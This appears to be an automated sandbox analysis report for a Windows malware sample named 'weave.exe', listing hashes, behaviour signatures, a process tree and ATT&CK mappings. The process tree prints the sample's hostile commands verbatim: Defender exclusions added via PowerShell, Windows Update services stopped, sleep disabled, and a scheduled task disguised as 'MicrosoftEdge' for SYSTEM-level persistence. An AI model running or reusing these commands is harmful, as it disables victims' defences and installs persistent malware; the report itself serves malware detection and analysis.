Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
17s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
27/09/2024, 18:31
Static task
static1
Behavioral task
behavioral1
Sample
weave.exe
Resource
win11-20240802-en
General
-
Target
weave.exe
-
Size
18.2MB
-
MD5
f293ebde82be4a4c20f5b58a05384108
-
SHA1
2240637695575a69e8918a9e9083d8f6d6a25356
-
SHA256
6ee011dc3dc0568d97acddc89bfbae917c42a811a99cd851e17bae209e9e7506
-
SHA512
a1a222e1203baad3141f2fbf3fca6f511842556c8175cdc6ea735e494aa9e923ef53d906c79bf53af1a1ec1e113cd70e5f06fb6068faf89912726e520e592224
-
SSDEEP
393216:duxU/9YlNS1YOmAP0ybcsOCdha3hgw7KQs6Qg5H2Ym8IBX3Iv:dP/9YzC3csZa3hgRgJIBXE
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 2316 created 3384 2316 updater.exe 52 PID 2316 created 3384 2316 updater.exe 52 PID 2316 created 3384 2316 updater.exe 52 PID 2316 created 3384 2316 updater.exe 52 PID 2316 created 3384 2316 updater.exe 52 PID 2316 created 3384 2316 updater.exe 52 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cli_gui.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4016 powershell.exe 2344 powershell.exe 2548 powershell.exe 1164 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cli_gui.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cli_gui.exe -
Executes dropped EXE 3 IoCs
pid Process 3372 cli_gui.exe 2316 updater.exe 4700 updater.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
resource yara_rule behavioral1/files/0x000500000002aac3-9.dat themida behavioral1/memory/3372-20-0x00007FF6A0DB0000-0x00007FF6A15E9000-memory.dmp themida behavioral1/memory/3372-49-0x00007FF6A0DB0000-0x00007FF6A15E9000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cli_gui.exe -
Power Settings 1 TTPs 5 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2496 powercfg.exe 1728 powercfg.exe 1068 cmd.exe 3376 powercfg.exe 1660 powercfg.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\syscfg.cfg weave.exe File created C:\Windows\system32\updater.exe weave.exe File opened for modification C:\Windows\System32\Tasks\MicrosoftEdge svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3532 weave.exe 3372 cli_gui.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2316 set thread context of 2352 2316 updater.exe 100 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Microsoft\Edge\updater.exe updater.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3424 sc.exe 4808 sc.exe 1344 sc.exe 2592 sc.exe 3404 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language weave.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3532 weave.exe 3532 weave.exe 3532 weave.exe 3532 weave.exe 3532 weave.exe 3532 weave.exe 3532 weave.exe 3532 weave.exe 2548 powershell.exe 2548 powershell.exe 3372 cli_gui.exe 3372 cli_gui.exe 4016 powershell.exe 4016 powershell.exe 2316 updater.exe 2316 updater.exe 2344 powershell.exe 2344 powershell.exe 2316 updater.exe 2316 updater.exe 2316 updater.exe 2316 updater.exe 2316 updater.exe 2316 updater.exe 2316 updater.exe 2316 updater.exe 2352 dialer.exe 2352 dialer.exe 1164 powershell.exe 1164 powershell.exe 2352 dialer.exe 2352 dialer.exe 1164 powershell.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2316 updater.exe 2316 updater.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 3372 cli_gui.exe 3372 cli_gui.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe 2352 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 4016 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 2352 dialer.exe Token: SeShutdownPrivilege 3376 powercfg.exe Token: SeCreatePagefilePrivilege 3376 powercfg.exe Token: SeDebugPrivilege 1164 powershell.exe Token: SeShutdownPrivilege 1660 powercfg.exe Token: SeCreatePagefilePrivilege 1660 powercfg.exe Token: SeShutdownPrivilege 2496 powercfg.exe Token: SeCreatePagefilePrivilege 2496 powercfg.exe Token: SeShutdownPrivilege 1728 powercfg.exe Token: SeCreatePagefilePrivilege 1728 powercfg.exe Token: SeIncreaseQuotaPrivilege 1164 powershell.exe Token: SeSecurityPrivilege 1164 powershell.exe Token: SeTakeOwnershipPrivilege 1164 powershell.exe Token: SeLoadDriverPrivilege 1164 powershell.exe Token: SeSystemProfilePrivilege 1164 powershell.exe Token: SeSystemtimePrivilege 1164 powershell.exe Token: SeProfSingleProcessPrivilege 1164 powershell.exe Token: SeIncBasePriorityPrivilege 1164 powershell.exe Token: SeCreatePagefilePrivilege 1164 powershell.exe Token: SeBackupPrivilege 1164 powershell.exe Token: SeRestorePrivilege 1164 powershell.exe Token: SeShutdownPrivilege 1164 powershell.exe Token: SeDebugPrivilege 1164 powershell.exe Token: SeSystemEnvironmentPrivilege 1164 powershell.exe Token: SeRemoteShutdownPrivilege 1164 powershell.exe Token: SeUndockPrivilege 1164 powershell.exe Token: SeManageVolumePrivilege 1164 powershell.exe Token: 33 1164 powershell.exe Token: 34 1164 powershell.exe Token: 35 1164 powershell.exe Token: 36 1164 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2620 svchost.exe Token: SeIncreaseQuotaPrivilege 2620 svchost.exe Token: SeSecurityPrivilege 2620 svchost.exe Token: SeTakeOwnershipPrivilege 2620 svchost.exe Token: SeLoadDriverPrivilege 2620 svchost.exe Token: SeSystemtimePrivilege 2620 svchost.exe Token: SeBackupPrivilege 2620 svchost.exe Token: SeRestorePrivilege 2620 svchost.exe Token: SeShutdownPrivilege 2620 svchost.exe Token: SeSystemEnvironmentPrivilege 2620 svchost.exe Token: SeUndockPrivilege 2620 svchost.exe Token: SeManageVolumePrivilege 2620 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2620 svchost.exe Token: SeIncreaseQuotaPrivilege 2620 svchost.exe Token: SeSecurityPrivilege 2620 svchost.exe Token: SeTakeOwnershipPrivilege 2620 svchost.exe Token: SeLoadDriverPrivilege 2620 svchost.exe Token: SeSystemtimePrivilege 2620 svchost.exe Token: SeBackupPrivilege 2620 svchost.exe Token: SeRestorePrivilege 2620 svchost.exe Token: SeShutdownPrivilege 2620 svchost.exe Token: SeSystemEnvironmentPrivilege 2620 svchost.exe Token: SeUndockPrivilege 2620 svchost.exe Token: SeManageVolumePrivilege 2620 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2620 svchost.exe Token: SeIncreaseQuotaPrivilege 2620 svchost.exe Token: SeSecurityPrivilege 2620 svchost.exe Token: SeTakeOwnershipPrivilege 2620 svchost.exe Token: SeLoadDriverPrivilege 2620 svchost.exe Token: SeSystemtimePrivilege 2620 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3532 weave.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3532 wrote to memory of 3372 3532 weave.exe 78 PID 3532 wrote to memory of 3372 3532 weave.exe 78 PID 3532 wrote to memory of 2316 3532 weave.exe 80 PID 3532 wrote to memory of 2316 3532 weave.exe 80 PID 3372 wrote to memory of 1972 3372 cli_gui.exe 81 PID 3372 wrote to memory of 1972 3372 cli_gui.exe 81 PID 1972 wrote to memory of 2548 1972 cmd.exe 82 PID 1972 wrote to memory of 2548 1972 cmd.exe 82 PID 3372 wrote to memory of 3980 3372 cli_gui.exe 83 PID 3372 wrote to memory of 3980 3372 cli_gui.exe 83 PID 3372 wrote to memory of 3408 3372 cli_gui.exe 84 PID 3372 wrote to memory of 3408 3372 cli_gui.exe 84 PID 3372 wrote to memory of 4620 3372 cli_gui.exe 85 PID 3372 wrote to memory of 4620 3372 cli_gui.exe 85 PID 3372 wrote to memory of 4804 3372 cli_gui.exe 86 PID 3372 wrote to memory of 4804 3372 cli_gui.exe 86 PID 4804 wrote to memory of 4016 4804 cmd.exe 87 PID 4804 wrote to memory of 4016 4804 cmd.exe 87 PID 3372 wrote to memory of 388 3372 cli_gui.exe 88 PID 3372 wrote to memory of 388 3372 cli_gui.exe 88 PID 3008 wrote to memory of 2592 3008 cmd.exe 93 PID 3008 wrote to memory of 2592 3008 cmd.exe 93 PID 3008 wrote to memory of 3404 3008 cmd.exe 94 PID 3008 wrote to memory of 3404 3008 cmd.exe 94 PID 3008 wrote to memory of 3424 3008 cmd.exe 95 PID 3008 wrote to memory of 3424 3008 cmd.exe 95 PID 3008 wrote to memory of 4808 3008 cmd.exe 96 PID 3008 wrote to memory of 4808 3008 cmd.exe 96 PID 3008 wrote to memory of 1344 3008 cmd.exe 97 PID 3008 wrote to memory of 1344 3008 cmd.exe 97 PID 2316 wrote to memory of 2352 2316 updater.exe 100 PID 1068 wrote to memory of 3376 1068 cmd.exe 103 PID 1068 wrote to memory of 3376 1068 cmd.exe 103 PID 1068 wrote to memory of 1660 1068 cmd.exe 104 PID 1068 wrote to memory of 1660 1068 cmd.exe 104 PID 1068 wrote to memory of 2496 1068 cmd.exe 105 PID 1068 wrote to memory of 2496 1068 cmd.exe 105 PID 1068 wrote to memory of 1728 1068 cmd.exe 106 PID 1068 wrote to memory of 1728 1068 cmd.exe 106 PID 2352 wrote to memory of 636 2352 dialer.exe 5 PID 2352 wrote to memory of 684 2352 dialer.exe 7 PID 2352 wrote to memory of 988 2352 dialer.exe 12 PID 2352 wrote to memory of 428 2352 dialer.exe 13 PID 2352 wrote to memory of 556 2352 dialer.exe 14 PID 2352 wrote to memory of 536 2352 dialer.exe 15 PID 2352 wrote to memory of 1028 2352 dialer.exe 16 PID 2352 wrote to memory of 1044 2352 dialer.exe 17 PID 2352 wrote to memory of 1152 2352 dialer.exe 19 PID 2352 wrote to memory of 1208 2352 dialer.exe 20 PID 2352 wrote to memory of 1260 2352 dialer.exe 21 PID 2352 wrote to memory of 1296 2352 dialer.exe 22 PID 2352 wrote to memory of 1308 2352 dialer.exe 23 PID 2352 wrote to memory of 1408 2352 dialer.exe 24 PID 2352 wrote to memory of 1428 2352 dialer.exe 25 PID 2352 wrote to memory of 1500 2352 dialer.exe 26 PID 2352 wrote to memory of 1516 2352 dialer.exe 27 PID 2352 wrote to memory of 1648 2352 dialer.exe 28 PID 2352 wrote to memory of 1708 2352 dialer.exe 29 PID 2352 wrote to memory of 1748 2352 dialer.exe 30 PID 2352 wrote to memory of 1760 2352 dialer.exe 31 PID 2352 wrote to memory of 1808 2352 dialer.exe 32 PID 2352 wrote to memory of 1816 2352 dialer.exe 33 PID 2352 wrote to memory of 1828 2352 dialer.exe 34 PID 2352 wrote to memory of 1908 2352 dialer.exe 35 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:636
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:428
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:988
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1152 -
C:\Program Files\Microsoft\Edge\updater.exe"C:\Program Files\Microsoft\Edge\updater.exe"2⤵
- Executes dropped EXE
PID:4700
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1296
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1408
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3048
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1500
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1760
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1916
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1368
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2184
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2580
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2844
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3120
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3384
-
C:\Users\Admin\AppData\Local\Temp\weave.exe"C:\Users\Admin\AppData\Local\Temp\weave.exe"2⤵
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Users\Admin\AppData\Local\Temp\cli_gui.exe"C:\Users\Admin\AppData\Local\Temp\cli_gui.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'" > NUL 2>&14⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:3980
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:3408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:4620
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'" > NUL 2>&14⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:1548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:2852
-
-
-
C:\Windows\system32\updater.exe"C:\Windows\system32\updater.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2316
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2592
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3404
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3424
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4808
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1344
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3376
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3956
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "MicrosoftEdge"2⤵PID:2104
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1012
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3544
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4044
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4052
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4352
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:888
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4900
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:4092
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:700
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1508
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Defense Evasion
Impair Defenses
1Indicator Removal
1Clear Windows Event Logs
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD52e8eb51096d6f6781456fef7df731d97
SHA1ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA25696bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA5120a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2
-
Filesize
944B
MD58cb7f4b4ab204cacd1af6b29c2a2042c
SHA1244540c38e33eac05826d54282a0bfa60340d6a1
SHA2564994013dabe4f131d401879278eee147add6349124ea6452358dca7e2344c7a6
SHA5127651cb6863a425840db610253151e271d3e8da26a8c633ce484247266fa226792ecb84b9578df3ab17fef84a5dfcad417b63a7df59c9650a907e08d59b91dd6e
-
Filesize
944B
MD580707036df540b6657f9d443b449e3c3
SHA1b3e7d5d97274942164bf93c8c4b8a9b68713f46f
SHA2566651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0
SHA51265e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.9MB
MD58f21c4390128917bf5af5c2ee3fbc592
SHA1733cc166b3161772755edf69314003a4a5e87953
SHA25678b628830cd84013ba1bdab6c5f4a1529f828119157a77d212d86e82f35a817b
SHA512c5116b27a4f722168c934319cd804a0390490be8341f27d39337877ce1c14e72c3dcdf725b982961c14de0a3da96362f2a9d4f4c486b7658c87c4801155cb015
-
Filesize
5.7MB
MD58cd62e3ece85c4c3e9f6f7c816256adf
SHA19712769be3f755c5ecbe68d38800a3a8ecdaf324
SHA25639ebcdbb6993787be2ed9d2b6668b9ee2707ca483a66b51d1302bfc610ba021b
SHA512a0aa9f0e6542c526fc18d48ab945d8be3245900381c9640f6e122a633a15dd9a9364bacd830fbc588a926ebef8240300c1fbf4211eae600cff8b7e2c63613501